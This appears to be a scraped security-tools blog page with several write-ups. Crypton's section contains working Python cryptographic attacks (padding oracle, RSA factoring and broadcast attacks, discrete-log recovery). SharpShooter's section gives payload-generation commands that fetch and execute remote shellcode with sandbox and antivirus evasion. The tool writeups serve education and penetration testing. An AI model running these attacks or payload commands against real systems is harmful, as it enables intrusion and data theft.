Crypton – Library Consisting Of Explanation And Implementation Of All The Existing Attacks On Various Encryption Systems, Digital Signatures, Hashing Algorithms

Crypton is an educational library to learn and practice Offensive and Defensive Cryptography. It is a collection of explanations and implementations of the existing vulnerabilities and attacks on various Encryption Systems (Symmetric and Asymmetric), Digital Signatures, Message Authentication Codes and Authenticated Encryption Systems. Each attack is supplemented with example challenges from "Capture The Flag" contests and their respective write-ups. Individuals who are already acquainted with this field (or are into CTFs) can use Crypton as a tool to solve challenges based on a particular existing vulnerability. The library will be continuously updated with attack explanations and CTF challenges!

WARNING: The author in no way guarantees that the code is secure. The library is only meant for educational purposes and the code should not be used in real-world implementations. All the example scripts in the library are trivial implementations.

There are different sections in this README:
- Motivation - What motivated me to create this library
- Library Structure - Directory structure of Crypton
- Domain Coverage - What cryptosystems and attacks are covered in this library
- Future Plans/TODO - Attacks/concepts that are to be included soon

Motivation

Provide CTF players and individuals interested in the field of Cryptography with a platform for learning attacks in crypto, and give experienced CTF players challenges to practice that are systematically divided into attacks associated with the different sub-domains of crypto. Also, illustrate through the attack explanations how crucial the proper implementation of protocols is.

Library Structure

Domain Coverage

1. Block Ciphers
Columns: S.No. | Topic | Explanation | Impl./Exploit | Challenge#
1. Block Cipher Basics - working of block ciphers, padding etc. [link]
2. Modes of Encryption - different modes of operation of block ciphers: ECB, CBC, CTR [link]
3. Block Size Detection - detect the block size of a block cipher encrypting data on a remote service [link]
4. Mode Detection - detect the type of mode of encryption: independent or dependent encryption of blocks [link]
5. ECB Byte at a Time - byte-at-a-time decryption of a secret string on a remote service that encrypts input+secret in ECB mode [link] [link]
6. CBC IV Detection - detect the value of the Initialisation Vector on a remote service that encrypts our input using a block cipher in CBC mode [link] [link]
7. CBC Bit Flipping Attack - exploiting a cookie generation mechanism to log in as admin when the cookie is generated using a block cipher in CBC mode [link] [link]
8. CBC Byte at a Time - byte-at-a-time decryption of a secret string on a remote service that encrypts input+secret in CBC mode [link] [link]
9. CBC Padding Oracle Attack - decryption of data encrypted by a vulnerable service providing encryption/decryption [link] [link]
10. CTR Bit Flipping - exploiting a cookie generation mechanism to log in as admin when the cookie is generated using a block cipher in CTR mode [link] [link]
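The CBC padding oracle attack (entry 9 above) as an added worked example; this is not Crypton's code. To keep it standard-library only, a hash-based Feistel network stands in for AES (the attack does not depend on which block cipher is used), and the key, IV and message are constructed values. The vulnerable service leaks exactly one bit per query, whether the padding was valid, and that is enough to decrypt everything without the key.

```python
# Added example (not Crypton's code): CBC padding-oracle decryption.
# A SHA-256-based Feistel permutation stands in for AES so this runs with the
# standard library only; the attack itself is cipher-independent.
import hashlib

BLOCK = 16  # block size in bytes (assumed for the toy cipher)

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def _f(key: bytes, half: bytes, rnd: int) -> bytes:
    # Round function: SHA-256(key || round || half), truncated to 8 bytes.
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]

def block_encrypt(key: bytes, block: bytes) -> bytes:
    # 8-round Feistel network on 16-byte blocks: a permutation, like any block cipher.
    l, r = block[:8], block[8:]
    for rnd in range(8):
        l, r = r, xor(l, _f(key, r, rnd))
    return r + l

def block_decrypt(key: bytes, block: bytes) -> bytes:
    r, l = block[:8], block[8:]
    for rnd in reversed(range(8)):
        l, r = xor(r, _f(key, l, rnd)), l
    return l + r

def pad(msg: bytes) -> bytes:
    n = BLOCK - len(msg) % BLOCK          # PKCS#7: always adds 1..16 bytes
    return msg + bytes([n]) * n

def unpad(msg: bytes) -> bytes:
    n = msg[-1]
    if not 1 <= n <= BLOCK or msg[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return msg[:-n]

def cbc_encrypt(key: bytes, iv: bytes, msg: bytes) -> bytes:
    data, prev, out = pad(msg), iv, b""
    for i in range(0, len(data), BLOCK):
        prev = block_encrypt(key, xor(data[i:i + BLOCK], prev))
        out += prev
    return out

def cbc_decrypt(key: bytes, iv: bytes, ct: bytes) -> bytes:
    prev, out = iv, b""
    for i in range(0, len(ct), BLOCK):
        out += xor(block_decrypt(key, ct[i:i + BLOCK]), prev)
        prev = ct[i:i + BLOCK]
    return unpad(out)

def padding_oracle(key: bytes, iv: bytes, ct: bytes) -> bool:
    # The vulnerable service: it reveals only whether the padding was valid.
    try:
        cbc_decrypt(key, iv, ct)
        return True
    except ValueError:
        return False

def attack(oracle, iv: bytes, ct: bytes) -> bytes:
    # Recover the plaintext without the key, using only yes/no answers.
    # Block C_i decrypts to D_K(C_i) XOR C_{i-1}; feeding a forged previous
    # block lets us choose what the service sees after decryption.
    blocks = [iv] + [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    plain = b""
    for prev, cur in zip(blocks, blocks[1:]):
        dec = bytearray(BLOCK)                # D_K(cur), found right to left
        for pos in range(BLOCK - 1, -1, -1):
            padv = BLOCK - pos                # padding value we aim for
            forged = bytearray(BLOCK)
            for j in range(pos + 1, BLOCK):
                forged[j] = dec[j] ^ padv     # known bytes forced to padv
            for guess in range(256):
                forged[pos] = guess
                if not oracle(bytes(forged), cur):
                    continue
                if pos == BLOCK - 1:
                    # Rule out the false positive where the block happens to
                    # end in valid padding longer than 0x01.
                    forged[pos - 1] ^= 1
                    still_ok = oracle(bytes(forged), cur)
                    forged[pos - 1] ^= 1
                    if not still_ok:
                        continue
                dec[pos] = guess ^ padv
                break
            else:
                raise RuntimeError("oracle never accepted a byte")
        plain += xor(bytes(dec), prev)
    return unpad(plain)

def demo() -> bytes:
    # Constructed key, IV and message; nothing here is real or secret.
    key, iv = b"sixteen byte key", bytes(range(16))
    ct = cbc_encrypt(key, iv, b"attack at dawn: flag{cbc_padding_oracle}")
    return attack(lambda v, b: padding_oracle(key, v, b), iv, ct)

if __name__ == "__main__":
    print(demo())
```

The fix on the service side is not to hide the padding error message: it is to authenticate the ciphertext (encrypt-then-MAC or an AEAD mode) and reject any tampered input before decryption, so the oracle never exists.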
2. RSA Encryption
Columns: S.No. | Topic | Explanation | Impl./Exploit | Challenge#
1. Unpadded RSA Enc/Dec - key generation, distribution, encryption/decryption, verification of the decryption formula and padding in RSA [link]
2. Direct Root Attack - attack on unpadded RSA with a low public key exponent [link]
3. Fermat's Factorisation - technique used to factor the modulus n when p and q are close to each other [link] [link] [link]
4. Pollard's p-1 Factorisation - technique to factorise n when p-1 (or q-1) has only small prime divisors [link] [link] [link]
5. Common Modulus Attack - decrypt a ciphertext when its plaintext has been encrypted twice under the same modulus n with different public exponents [link] [link] [link]
6. Common Prime Attack - retrieve the factors of moduli n1 and n2 when they share a prime factor [link] [link]
7. Wiener's Attack - recover the decryption exponent d when d < N^0.25 [link] [link] [link]
8. Wiener's Attack Variant - recover d when it is a few bits larger than N^0.25 (as well as when d < N^0.25) [link] [link] [link]
9. Coppersmith's Attack - Coppersmith's theorem, attack on stereotyped messages and factoring n with high bits known [link] [link] [link]
10. Franklin-Reiter Related Message Attack - retrieve related messages encrypted under the same modulus [link] [link] [link]
11. Hastad's Broadcast Attack (with extension) - retrieve a message broadcast to several recipients, encrypted with the same exponent but different moduli [link] [link] (script needs to be fixed) [link]
12. PKCS1-v1.5 Padded RSA Encryption/Decryption - ASN.1 encoding, padded RSA encryption (needs to be fixed)
13. Intro RSA Challenges - basic challenges in RSA related to Number Theory [link] [link]
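Three of the attacks above (Fermat's factorisation, the common modulus attack and Hastad's broadcast attack with e = 3) as one added example; these are not Crypton's scripts. The primes and messages are constructed toy values so the run is instant; the arithmetic is identical at 2048 bits, which is why each of these conditions (close primes, a shared modulus, unpadded broadcast) is a real-world key-generation or protocol failure rather than a CTF curiosity.

```python
# Added example (not Crypton's scripts): three textbook-RSA attacks that need
# only Python's big integers. All keys below are constructed toy values.
from functools import reduce
from math import isqrt

def fermat_factor(n: int):
    # p and q close together: n = a^2 - b^2 with a = (p+q)/2, b = (q-p)/2, so
    # start at ceil(sqrt(n)) and walk a upward until a^2 - n is a perfect square.
    a = isqrt(n)
    if a * a < n:
        a += 1
    while True:
        b2 = a * a - n
        b = isqrt(b2)
        if b * b == b2:
            return a - b, a + b
        a += 1

def xgcd(a: int, b: int):
    # Extended Euclid: returns (g, x, y) with a*x + b*y = g = gcd(a, b).
    x0, x1, y0, y1 = 1, 0, 0, 1
    while b:
        q, a, b = a // b, b, a % b
        x0, x1 = x1, x0 - q * x1
        y0, y1 = y1, y0 - q * y1
    return a, x0, y0

def common_modulus(n: int, e1: int, c1: int, e2: int, c2: int) -> int:
    # Same m encrypted under (n, e1) and (n, e2) with gcd(e1, e2) = 1.
    # Find a, b with a*e1 + b*e2 = 1; then c1^a * c2^b = m^(a*e1 + b*e2) = m.
    g, a, b = xgcd(e1, e2)
    if g != 1:
        raise ValueError("public exponents must be coprime")
    if a < 0:                      # negative exponent: invert the ciphertext
        c1, a = pow(c1, -1, n), -a
    if b < 0:
        c2, b = pow(c2, -1, n), -b
    return pow(c1, a, n) * pow(c2, b, n) % n

def crt(residues, moduli) -> int:
    # Chinese Remainder Theorem for pairwise-coprime moduli.
    total = reduce(lambda x, y: x * y, moduli)
    x = 0
    for r, m in zip(residues, moduli):
        part = total // m
        x += r * part * pow(part, -1, m)
    return x % total

def iroot(x: int, k: int) -> int:
    # Smallest r with r**k >= x, by binary search on integers (no floats).
    lo, hi = 0, 1 << (x.bit_length() // k + 1)
    while lo < hi:
        mid = (lo + hi) // 2
        if mid ** k < x:
            lo = mid + 1
        else:
            hi = mid
    return lo

def hastad_broadcast(cts, moduli, e: int = 3) -> int:
    # Same m sent to e recipients with exponent e and distinct moduli: CRT on
    # the e ciphertexts gives m^e as a plain integer (m^e < N1*N2*...*Ne), so
    # an ordinary integer e-th root recovers m. Unpadded RSA has no security.
    x = crt(cts, moduli)
    m = iroot(x, e)
    if m ** e != x:
        raise ValueError("need e ciphertexts with m^e below the product of moduli")
    return m

def demo() -> dict:
    # Constructed parameters: 1000003 and 1000033 are primes only 30 apart;
    # the other primes are well known and used only to build toy moduli.
    n_close = 1000003 * 1000033
    n = 1000000007 * 998244353
    m = int.from_bytes(b"same n", "big")
    moduli = [1000000007 * 998244353, 2147483647 * 1000000009,
              1000003 * 2305843009213693951]
    mb = int.from_bytes(b"hastad", "big")
    return {
        "fermat": fermat_factor(n_close),
        "common_modulus": common_modulus(n, 3, pow(m, 3, n), 65537, pow(m, 65537, n)),
        "hastad": hastad_broadcast([pow(mb, 3, k) for k in moduli], moduli),
    }

if __name__ == "__main__":
    print(demo())
```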
3. Message Authentication Codes (MACs)
Columns: S.No. | Topic | Explanation | Impl./Exploit | Challenge#
1. Message Authentication Code - internals and security analysis of MACs [link]
2. CBC-MAC Forgery - generating two messages M1 and M2 that have the same CBC-MAC authentication tag [link] [link]
3. Length Extension Attack on CBC-MAC - generate a valid authentication tag for the message M1 || M2 (concatenation) given MAC(M1) [link] [link]

4. Discrete Logarithm Problem
Columns: S.No. | Topic | Explanation | Impl./Exploit | Challenge#
1. DLP - cyclic groups, the discrete logarithm problem, Baby-Step Giant-Step algorithm [link] [link]
2. Elliptic Curve DLP - defining the identity element, the inverse of a point, cyclic groups over points on an EC, Hasse's theorem, ECDLP [link]

5. ElGamal Encryption
Columns: S.No. | Topic | Explanation | Impl./Exploit | Challenge#
1. ElGamal Cryptosystem - Encryption/Decryption - key generation, encryption, decryption in the ElGamal cryptosystem [link] [link] [link]

6. Authenticated Encryption (AE)
Columns: S.No. | Topic | Explanation | Impl./Exploit | Challenge#
1. AE basics & internals - working of authenticated encryption [link]
2. AE with MACs - different techniques of implementing AE with MACs: Encrypt-and-MAC, MAC-then-Encrypt and Encrypt-then-MAC [link]
3. Authenticated Ciphers [link]
4. AE with Associated Data [link]
5. AES-GCM - encryption in AES-GCM, Wegman-Carter MAC [link] [link]
6. Forbidden Attack on AES-GCM - attack on AES-GCM due to nonce reuse [link] [link]

7. Elliptic Curves
Columns: S.No. | Topic | Explanation | Impl./Exploit | Challenge#
1. Elliptic Curve Internals - defining Elliptic Curves, point addition, point doubling and scalar multiplication [link]
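The DLP and ElGamal entries above, as one added example that is not Crypton's code: ElGamal encryption/decryption over GF(p) with a constructed 30-bit prime p = 1000000007 and g = 5 (assumed generator), followed by Baby-Step Giant-Step recovering the private key x from the public key h = g^x. With p this small the search takes about sqrt(p), roughly 32,000 steps; at the 2048-bit sizes used in practice the same algorithm needs about 2^1024 steps, which is the entire security argument of the scheme.

```python
# Added example (not Crypton's code): ElGamal over a prime field, and the
# Baby-Step Giant-Step algorithm solving the DLP for a key that is small enough.
from math import isqrt

P = 1000000007   # constructed toy prime; real ElGamal uses 2048+ bit moduli
G = 5            # generator (assumed)

def keygen(x: int) -> int:
    # Private key x, public key h = g^x mod p.
    return pow(G, x, P)

def encrypt(h: int, m: int, k: int) -> tuple:
    # Fresh ephemeral k per message; ciphertext (c1, c2) = (g^k, m * h^k).
    return pow(G, k, P), m * pow(h, k, P) % P

def decrypt(x: int, c1: int, c2: int) -> int:
    # m = c2 / c1^x. c1^(p-1-x) is c1^(-x) by Fermat's little theorem.
    return c2 * pow(c1, P - 1 - x, P) % P

def bsgs(g: int, h: int, p: int, order: int):
    # Solve g^x = h (mod p) for 0 <= x < order in O(sqrt(order)) time and memory.
    # Write x = i*m + j: baby steps tabulate g^j, giant steps walk h * g^(-m*i)
    # until the walk lands on a tabulated value.
    m = isqrt(order) + 1
    baby = {}
    cur = 1
    for j in range(m):
        baby.setdefault(cur, j)
        cur = cur * g % p
    step = pow(g, -m, p)          # g^(-m) mod p
    gamma = h
    for i in range(m):
        if gamma in baby:
            return i * m + baby[gamma]
        gamma = gamma * step % p
    return None

def demo() -> dict:
    x = 123456                    # constructed private key
    h = keygen(x)                 # this is all the attacker sees (with p, g)
    c1, c2 = encrypt(h, 424242, 98765)
    recovered = bsgs(G, h, P, P - 1)
    return {"x": recovered, "m": decrypt(recovered, c1, c2)}

if __name__ == "__main__":
    print(demo())
```

The baby-step table is the memory cost of the algorithm; Pollard's rho reaches the same sqrt(order) running time with constant memory, which is why group sizes are chosen against the square-root bound rather than against brute force.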
8. Digital Signatures
Columns: S.No. | Topic | Explanation | Impl./Exploit | Challenge#
1. ElGamal Signatures - key generation, signature generation, signature verification and correctness of the ElGamal signature scheme [link] [link] [link]
2. Elliptic Curve DSA - signature generation, signature verification and correctness of the signature algorithm [link]
3. Attack on k-reuse in ECDSA - recovery of the private key (and hence forgery of ECDSA signatures) when the nonce k is reused [link]
4. Unpadded RSA Digital Signatures - signature generation and verification in the RSA digital signature scheme [link] [link]
5. PKCS1-v1.5 padded RSA Digital Signatures [link] [link]
6. e=3 Bleichenbacher's Attack [link] [link] [link]

TODO

RSA Encryption
- Chosen Ciphertext Attack on RSA Cryptosystem - byte-by-byte decryption
- Padding Oracle Attack on PKCS1 padded RSA encryption system
Fermat's Factorisation
- Sieve improvement
Coppersmith's Attack
- Boneh-Durfee Attack
Hastad's Broadcast Attack
- Implementation of HBA on padded messages
- PKCS1-v1.5 Padded RSA encryption
[More to be added]

Author
Ashutosh Ahelleya
Twitter: https://twitter.com/ashutosha_
Blog: https://masterpessimistaa.wordpress.com
EmailID: [email protected]

Download Crypton

Link: http://feedproxy.google.com/~r/PentestTools/~3/pV9GKrjPU_4/crypton-library-consisting-of.html

Lynis 2.6.8 – Security Auditing Tool for Unix/Linux Systems

We are excited to announce this major release of the auditing tool Lynis. Several big changes have been made to core functions of Lynis. These changes are the next step in the simplification improvements we have been making. There is a risk of breaking your existing configuration.

Lynis is an open source security auditing tool. It is used by system administrators, security professionals, and auditors to evaluate the security defenses of their Linux and UNIX-based systems. It runs on the host itself, so it performs more extensive security scans than vulnerability scanners.

Supported operating systems
The tool has almost no dependencies, therefore it runs on almost all Unix-based systems and versions, including:
- AIX
- FreeBSD
- HP-UX
- Linux
- Mac OS
- NetBSD
- OpenBSD
- Solaris
- and others
It even runs on systems like the Raspberry Pi and several storage devices!

Installation optional
Lynis is light-weight and easy to use. Installation is optional: just copy it to a system, and use "./lynis audit system" to start the security scan. It is written in shell script and released as open source software (GPL).

How it works
Lynis performs hundreds of individual tests to determine the security state of the system. The security scan itself consists of performing a set of steps, from initialization of the program up to the report.

Steps
1. Determine operating system
2. Search for available tools and utilities
3. Check for Lynis update
4. Run tests from enabled plugins
5. Run security tests per category
6. Report status of security scan

Besides the data displayed on the screen, all technical details about the scan are stored in a log file. Any findings (warnings, suggestions, data collection) are stored in a report file.

Opportunistic Scanning
Lynis scanning is opportunistic: it uses what it can find. For example, if it sees you are running Apache, it will perform an initial round of Apache-related tests. When during the Apache scan it also discovers an SSL/TLS configuration, it will perform additional auditing steps on that. While doing that, it will collect the discovered certificates so they can be scanned later as well.

In-depth security scans
By performing opportunistic scanning, the tool can run with almost no dependencies. The more it finds, the deeper the audit will be. In other words, Lynis will always perform scans which are customized to your system. No audit will be the same!

Use cases
Since Lynis is flexible, it is used for several different purposes. Typical use cases for Lynis include:
- Security auditing
- Compliance testing (e.g. PCI, HIPAA, SOx)
- Vulnerability detection and scanning
- System hardening

Resources used for testing
Many other tools use the same data files for performing tests. Since Lynis is not limited to a few common Linux distributions, it uses tests from standards and many custom ones not found in any other tool:
- Best practices
- CIS
- NIST
- NSA
- OpenSCAP data
- Vendor guides and recommendations (e.g. Debian, Gentoo, Red Hat)

Lynis Plugins
Plugins enable the tool to perform additional tests. They can be seen as an extension (or add-on) to Lynis, enhancing its functionality. One example is the compliance checking plugin, which performs specific tests only applicable to some standard.

Changelog
Upgrade note

## Lynis 2.6.8 (2018-08-23)

### Changed
- BOOT-5104 - improved parsing of boot parameters to init process
- PHP-2372 - test all PHP files for expose_php and improved logging
- Alpine Linux detection for Docker audit
- Docker check now tests also for CMD, ENTRYPOINT, and USER configuration
- Improved display in Docker output for showing which keys are used for signing

Download Lynis 2.6.8

Link: http://feedproxy.google.com/~r/PentestTools/~3/crZYwFyGbEM/lynis-268-security-auditing-tool-for.html

SharpShooter – Payload Generation Framework

SharpShooter is a payload creation framework for the retrieval and execution of arbitrary CSharp source code. SharpShooter is capable of creating payloads in a variety of formats, including HTA, JS, VBS and WSF. It leverages James Forshaw's DotNetToJavaScript tool to invoke methods from the SharpShooter DotNet serialised object. Payloads can be retrieved using Web or DNS delivery or both; SharpShooter is compatible with the MDSec ActiveBreach PowerDNS project. Alternatively, stageless payloads with embedded shellcode execution can also be generated for the same scripting formats.

SharpShooter payloads are RC4 encrypted with a random key to provide some modest anti-virus evasion, and the project includes the capability to integrate sandbox detection and environment keying to assist in evading detection.

SharpShooter includes a predefined CSharp template for executing shellcode with staged and stageless payloads, but any CSharp code can be compiled and invoked in memory using reflection, courtesy of CSharp's CodeDom provider.

Finally, SharpShooter provides the ability to bundle the payload inside an HTML file using the Demiguise HTML smuggling technique.

SharpShooter targets v2, v3 and v4 of the .NET framework, which will be found on most end-user Windows workstations.

Version 1.0 of SharpShooter introduced several new concepts, including COM staging, execution of Squiblydoo and Squiblytwo, as well as XSL execution. To accomplish this new functionality, several new flags were added: --com, --awl and --awlurl. Further information can be found on the MDSec blog post.

Usage - Command Line Mode:
SharpShooter is highly configurable, supporting a number of different payload types, sandbox evasions, delivery methods and output types. Running SharpShooter with the --help argument will produce the following output:

usage: SharpShooter.py [-h] [--stageless] [--dotnetver <ver>] [--com <com>] [--awl <awl>] [--awlurl <awlurl>] [--payload <format>] [--sandbox <types>] [--amsi <amsi>] [--delivery <type>] [--rawscfile <path>] [--shellcode] [--scfile <path>] [--refs <refs>] [--namespace <ns>] [--entrypoint <ep>] [--web <web>] [--dns <dns>] [--output <output>] [--smuggle] [--template <tpl>]

optional arguments:
  -h, --help            show this help message and exit
  --stageless           Create a stageless payload
  --dotnetver <ver>     Target .NET Version: 2 or 4
  --com <com>           COM Staging Technique: outlook, shellbrowserwin, wmi, wscript, xslremote
  --awl <awl>           Application Whitelist Bypass Technique: wmic, regsvr32
  --awlurl <awlurl>     URL to retrieve XSL/SCT payload
  --payload <format>    Payload type: hta, js, jse, vba, vbe, vbs, wsf
  --sandbox <types>     Anti-sandbox techniques: [1] Key to Domain (e.g. 1=CONTOSO) [2] Ensure Domain Joined [3] Check for Sandbox Artifacts [4] Check for Bad MACs [5] Check for Debugging
  --amsi <amsi>         Use amsi bypass technique: amsienable
  --delivery <type>     Delivery method: web, dns, both
  --rawscfile <path>    Path to raw shellcode file for stageless payloads
  --shellcode           Use built in shellcode execution
  --scfile <path>       Path to shellcode file as CSharp byte array
  --refs <refs>         References required to compile custom CSharp, e.g. mscorlib.dll,System.Windows.Forms.dll
  --namespace <ns>      Namespace for custom CSharp, e.g. Foo.bar
  --entrypoint <ep>     Method to execute, e.g. Main
  --web <web>           URI for web delivery
  --dns <dns>           Domain for DNS delivery
  --output <output>     Name of output file (e.g. maldoc)
  --smuggle             Smuggle file inside HTML
  --template <tpl>      Name of template file (e.g. mcafee)

Examples of some use cases are provided below:

Stageless JavaScript
SharpShooter.py --stageless --dotnetver 4 --payload js --output foo --rawscfile ./raw.txt --sandbox 1=contoso,2,3
Create a stageless JavaScript payload targeting version 4 of the .NET framework. This example will create a payload named foo.js in the output directory. The shellcode is read from the ./raw.txt file. The payload attempts to enforce some sandbox evasion by keying execution to the CONTOSO domain, and checking for known sandbox/VM artifacts.

Stageless HTA
SharpShooter.py --stageless --dotnetver 2 --payload hta --output foo --rawscfile ./raw.txt --sandbox 4 --smuggle --template mcafee
Create a stageless HTA payload targeting version 2/3 of the .NET framework. This example will create a payload named foo.hta in the output directory. The shellcode is read from the ./raw.txt file. The payload attempts to enforce some sandbox evasion by checking for known virtual MAC addresses. An HTML smuggling payload will also be generated, named foo.html in the output directory. This payload will use the example McAfee virus scan template.

Staged VBS
SharpShooter.py --payload vbs --delivery both --output foo --web http://www.foo.bar/shellcode.payload --dns bar.foo --shellcode --scfile ./csharpsc.txt --sandbox 1=contoso --smuggle --template mcafee --dotnetver 4
This example creates a staged VBS payload that performs both Web and DNS delivery. The payload will attempt to retrieve a GZipped CSharp file that executes the shellcode supplied as a CSharp byte array in the csharpsc.txt file. The CSharp file used is the built-in SharpShooter shellcode execution template. The payload is created in the output directory named foo.payload and should be hosted at http://www.foo.bar/shellcode.payload. The same file should also be hosted on the bar.foo domain using PowerDNS to serve it. The VBS file will attempt to key execution to the CONTOSO domain and will be embedded in an HTML file using the HTML smuggling technique with the McAfee virus scan template. The resultant payload is stored in the output directory named foo.html.

Custom CSharp inside VBS
SharpShooter.py --dotnetver 2 --payload js --sandbox 2,3,4,5 --delivery web --refs mscorlib.dll,System.Windows.Forms.dll --namespace MDSec.SharpShooter --entrypoint Main --web http://www.phish.com/implant.payload --output malicious --smuggle --template mcafee
This example demonstrates how to create a staged JS payload that performs web delivery, retrieving a payload from http://www.phish.com/implant.payload. The generated payload will attempt sandbox evasion, and attempt to compile the retrieved payload, which requires mscorlib.dll and System.Windows.Forms.dll as DLL references. The Main method in the MDSec.SharpShooter namespace will be executed on successful compilation.

Creation of a Squiblytwo VBS
SharpShooter.py --stageless --dotnetver 2 --payload vbs --output foo --rawscfile ./x86payload.bin --smuggle --template mcafee --com outlook --awlurl http://192.168.2.8:8080/foo.xsl
This example creates a VBS smuggled COM stager that uses the Outlook.CreateObject() COM method as a primitive to execute wmic.exe, which in turn executes a hosted stylesheet. The --awl parameter is not used here; it defaults to wmic.

Creation of a XSL HTA
SharpShooter.py --stageless --dotnetver 2 --payload hta --output foo --rawscfile ./x86payload.bin --smuggle --template mcafee --com xslremote --awlurl http://192.168.2.8:8080/foo.xsl
This example creates a smuggled HTA file that uses the XMLDOM COM interface to retrieve and execute a hosted stylesheet.

Author and Credits
Author: Dominic Chell, MDSec ActiveBreach (@domchell and @mdseclabs)
Credits (some handles and project names were lost to e-mail obfuscation in the source and are marked [...]):
- @tiraniddo: James Forshaw for DotNetToJavaScript
- [...]: for [...]
- [...]: Rich Warren for Demiguise
- [...] and @ChrisTruncer: Brandon Arvanaghi and Chris Truncer for [...]
- [...]: Documentation for Squiblydoo and Squiblytwo techniques

Download SharpShooter

Link: http://feedproxy.google.com/~r/PentestTools/~3/KJriJP1hJA4/sharpshooter-payload-generation.html

Mallet – A Framework For Creating Proxies

Mallet is a tool for creating proxies for arbitrary protocols, along similar lines to the familiar intercepting web proxies, just more generic.

It is built upon the Netty framework, and relies heavily on the Netty pipeline concept, which allows the graphical assembly of graphs of handlers. In the Netty world, handler instances provide frame delimitation (i.e. where does a message start and end), protocol decoding and encoding (converting a stream of bytes into Java objects and back again, or converting a stream of bytes into a different stream of bytes, think compression and decompression), and higher-level logic (actually doing something with those objects).

By following the careful separation of Codecs from Handlers that actually manipulate the messages, Mallet can benefit from the large library of existing Codecs, and avoid reimplementation of many protocols. The final piece of the puzzle is provided by a Handler that copies messages received on one pipeline to another pipeline, proxying those messages on to their final destination.

Of course, while the messages are within Mallet, they can easily be tampered with, either with custom Handlers written in Java or a JSR-223 compliant scripting language, or manually, using one of the provided editors.

You can get an idea of the available codecs by looking at the Netty source on GitHub, under the codec* directories.

Building Mallet
Mallet makes use of Maven, so compiling the code is a matter of:
mvn package
To run it:
cd target/
java -jar mallet-1.0-SNAPSHOT-spring-boot.jar

There are a few sample graphs provided in the examples/ directory. The JSON graphs expect a JSON client to connect to Mallet on localhost:9998/tcp, with the real server at localhost:9999/tcp. Only the last JSON graph (json5.mxe) makes any assumptions about the structure of the JSON messages being passed, so the others should be applicable to any app that sends JSON messages.

The demo.mxe shows a complex graph, with two pipelines, both TCP and UDP. The TCP pipeline is built to support HTTP and HTTPS on ports 80 and 443 respectively, as well as WebSockets, while relaying any other traffic directly to its destination. The UDP pipeline is built to process DNS requests on localhost:1053/udp, replace queries for google.com with queries for www.sensepost.com, and forward the requests on to Google DNS servers.

Download Mallet

Link: http://feedproxy.google.com/~r/PentestTools/~3/uEIqUbaTQy4/mallet-framework-for-creating-proxies.html

CMSeeK v1.0.9 – CMS Detection And Exploitation Suite (Scan WordPress, Joomla, Drupal And 100 Other CMSs)

What is a CMS?
A content management system (CMS) manages the creation and modification of digital content. It typically supports multiple users in a collaborative environment. Some notable examples are WordPress, Joomla and Drupal.

Release History
- Version 1.0.9 [21-08-2018]
- Version 1.0.8 [14-08-2018]
- Version 1.0.7 [07-08-2018]
- Version 1.0.6 [23-07-2018]
- Version 1.0.5 [19-07-2018]
- Version 1.0.4 [17-07-2018]
- Version 1.0.3 [06-07-2018]
- Version 1.0.2 [06-07-2018]
- Version 1.0.1 [19-06-2018]
- Version 1.0.0 [15-06-2018]
Changelog File

Functions Of CMSeeK:
- Basic CMS Detection of over 30 CMSs
- Drupal version detection
- Advanced WordPress Scans
  - Detects Version
  - User Enumeration
  - Plugins Enumeration
  - Theme Enumeration
  - Detects Users (3 Detection Methods)
  - Looks for Version Vulnerabilities and much more!
- Advanced Joomla Scans
  - Version detection
  - Backup files finder
  - Admin page finder
  - Core vulnerability detection
  - Directory listing check
  - Config leak detection
  - Various other checks
- Modular bruteforce system
  - Use pre-made bruteforce modules or create your own and integrate them with it

Requirements and Compatibility:
CMSeeK is built using python3, so you will need python3 to run this tool. It is compatible with unix-based systems as of now; Windows support will be added later. CMSeeK relies on git for auto-update, so make sure git is installed.

Installation and Usage:
It is fairly easy to use CMSeeK. Just make sure you have python3 and git (only needed for cloning the repo and updating) installed and use the following commands:
git clone https://github.com/Tuhinshubhra/CMSeeK
cd CMSeeK
For guided scanning:
python3 cmseek.py
Else:
python3 cmseek.py -u [...]

Help menu from the program:

USAGE:
  python3 cmseek.py (for a guided scanning) OR
  python3 cmseek.py [OPTIONS] <Target Specification>

SPECIFYING TARGET:
  -u URL, --url URL        Target Url
  -l LIST, -list LIST      path of the file containing list of sites for multi-site scan (comma separated)

USER AGENT:
  -r, --random-agent       Use a random user agent
  --user-agent USER_AGENT  Specify custom user agent

OUTPUT:
  -v, --verbose            Increase output verbosity

VERSION & UPDATING:
  --update                 Update CMSeeK (Requires git)
  --version                Show CMSeeK version and exit

HELP & MISCELLANEOUS:
  -h, --help               Show this help message and exit
  --clear-result           Delete all the scan result

EXAMPLE USAGE:
  python3 cmseek.py -u example.com                           # Scan example.com
  python3 cmseek.py -l /home/user/target.txt                 # Scan the sites specified in target.txt (comma separated)
  python3 cmseek.py -u example.com --user-agent Mozilla 5.0  # Scan example.com using the custom user agent "Mozilla 5.0" (quote the string on your shell if it contains spaces)
  python3 cmseek.py -u example.com --random-agent            # Scan example.com using a random user agent
  python3 cmseek.py -v -u example.com                        # Enable verbose output while scanning example.com

Checking For Update:
You can check for updates either from the main menu or with python3 cmseek.py --update, which checks for an update and applies it automatically.
P.S: Please make sure you have git installed; CMSeeK uses git to apply auto-updates.

Detection Methods:
CMSeeK detects the CMS via the following:
- HTTP Headers
- Generator meta tag
- Page source code
- robots.txt

Supported CMSs:
CMSeeK currently can detect 40 CMSs; you can find the list in the cmss.py file, which is present in the cmseekdb directory. All the CMSs are stored in the following way:
cmsID = {
    'name': 'Name Of CMS',
    'url': 'Official URL of the CMS',
    'vd': 'Version Detection (0 for no, 1 for yes)',
    'deeps': 'Deep Scan (0 for no, 1 for yes)'
}

Scan Result:
All of your scan results are stored in a json file named cms.json; you can find the logs inside the Result\<Target Site> directory. Bruteforce results are stored in a txt file under the site's result directory as well. Here is an example of the json report log:

Bruteforce Modules:
CMSeeK has a modular bruteforce system, meaning you can add your custom-made bruteforce modules to work with CMSeeK. Proper documentation for creating modules will be created shortly, but in case you have already figured out how to (pretty easy once you analyze the pre-made modules), all you need to do is this:
1. Add a comment exactly like this: # <Name Of The CMS> Bruteforce module. This will help CMSeeK to know the name of the CMS using regex.
2. Add another comment: ### cmseekbruteforcemodule. This will help CMSeeK to know it is a module.
3. Copy and paste the module into the brutecms directory under CMSeeK's directory.
